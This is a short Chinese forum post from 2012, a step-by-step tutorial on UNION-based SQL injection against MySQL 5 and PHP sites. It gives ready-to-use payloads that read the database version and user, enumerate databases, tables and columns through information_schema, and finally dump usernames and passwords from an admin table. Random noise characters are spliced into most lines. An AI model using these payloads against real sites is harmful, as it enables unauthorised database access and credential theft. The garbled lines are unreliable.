$ ?% _ G5 v" t0 P# w# K$ @
教程内容:Mysql 5+php 注入
$ B8 N7 M" D b5 H: y7 T$ C' u* ]& R! F5 b+ o
& u! \$ r" u9 Q- A
" O) z: H. t' D* q
一.查看MYSQL基本信息(库名,版本,用户)
3 @& f6 K) \; }5 z8 [; O" _9 G6 I
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*6 F2 X6 K5 J0 o
, g- `- g- [8 U! Y
二.查数据库
' T" n" C( ^) c6 b
! K" w, }# X: y& k* G8 cand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*( I3 L! j t2 |2 x7 E3 ~
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
0 N: C, J: L& }$ y$ A# N0 g7 g! ]2 w6 \- r; N" t
三.暴表4 R( w! I. F: e3 H1 P3 G. |
; N. H9 ]# q0 A5 x/ C
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*1 I1 X; Y# W; D! u" k( @ L
I+ e4 s( U- o2 M8 i" tlimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。3 C% `1 R7 K( F9 c
, ]: O9 J$ @6 c* l' `
四.暴字段
% W; c9 l, g6 w6 |
/ r: E3 O# F' Y4 w, R/ m# Zand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*4 N8 t1 _5 M& M4 E% _
( q* Y2 r5 V8 [: ~7 Y* y! ^8 C( wlimit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。8 u# E/ [3 @& T
$ i3 N, Y4 ~7 `
五.暴数据
5 H, J" J2 g7 X; I( L+ a) q* b, ^5 d) H1 s
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*7 _+ p+ ^1 R/ _3 w" ^
, _) e1 B% `$ q$ p% e% [. k3 w% q
1 r: F* _& L) ]0 e3 p# c1 n这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。 p) X$ q) U) J5 Q* m2 y8 X
|
发表于 2012-9-13 16:27:53
收藏
支持
反对